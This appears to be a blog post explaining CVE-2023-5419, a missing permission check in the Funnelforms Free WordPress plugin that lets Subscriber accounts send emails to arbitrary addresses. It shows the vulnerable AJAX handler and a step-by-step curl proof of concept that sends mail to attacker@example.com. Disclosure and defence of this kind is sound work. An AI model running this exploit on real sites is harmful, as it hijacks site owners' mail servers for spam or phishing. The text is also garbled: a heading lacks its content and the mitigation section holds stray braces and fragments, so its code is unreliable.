CVE-2023-5419 - How Funnelforms Free Plugin for WordPress Lets Subscribers Send Emails Anywhere

WordPress powers more than 40% of the web, but plugins like Funnelforms Free can put your site at risk. CVE-2023-5419 is one of those vulnerabilities that, in simple terms, means anyone with a basic user account can exploit your site to send emails wherever they want. In this post, I’ll break down how it works, show the vulnerable code, and provide mitigation steps.

What Is CVE-2023-5419?

CVE-2023-5419 is a security flaw in the Funnelforms Free plugin for WordPress, affecting versions up to and including 3.4. The bug lets any logged-in user—even those with just a basic “Subscriber” role—use your site to send test emails to any email address they choose. Why? Because the code doesn’t check if the user should even have access to do this!

Abuse your resources and potentially get you blacklisted

All this, just because a capability check was missing in the code.

Breaking Down the Vulnerable Code

The main issue lies in the fnsf_af2_test_mail function. Here’s a simplified example of the problem:

// File: includes/ajax_handler.php (or similar)

add_action('wp_ajax_fnsf_af2_test_mail', 'fnsf_af2_test_mail');

function fnsf_af2_test_mail() {
    // No capability check here!
    $to = $_POST['to'];
    $subject = 'Test Email';
    $body = 'This is a test email from Funnelforms.';
    
    wp_mail($to, $subject, $body);
    
    echo 'Test email sent.';
    wp_die();
}

There should be a check like this

if (!current_user_can('manage_options')) {
    wp_die('Unauthorized');
}

By not checking the current user’s capabilities, *anyone* logged in can call this AJAX function.

Step 1: Log in as any user (even just a subscriber).

Step 2: Send a POST request to the admin-ajax.php endpoint.

Example with curl

curl -X POST \
  -b "wordpress_logged_in_[hash]=[cookie]" \
  --data "action=fnsf_af2_test_mail&to=attacker@example.com" \
  "https://your-site.com/wp-admin/admin-ajax.php";

to=attacker@example.com is the email address you want to send to.

Step 3: The server sends an email from your domain to attacker@example.com, or wherever the attacker chooses.

Update the Plugin:

As soon as a patch is released, update to the latest version.

}

// ... rest of the function
}

References

- Original vulnerability entry (WPScan)
- Funnelforms Free Plugin on WordPress.org
- Wordfence Advisory

Final Notes

CVE-2023-5419 is a reminder how even small mistakes in plugin code can have big consequences. Always keep plugins up-to-date, and if you’re a developer, double-check permissions before letting users trigger actions. If you run WordPress, take this as a reason to review your installed plugins. One small oversight can open the door for attackers—even ones with barely any permissions.

—

Want more deep-dives like this? Let me know in the comments or follow for fresh WordPress security breakdowns!

Timeline

Published on: 11/22/2023 16:15:12 UTC
Last modified on: 11/27/2023 20:16:37 UTC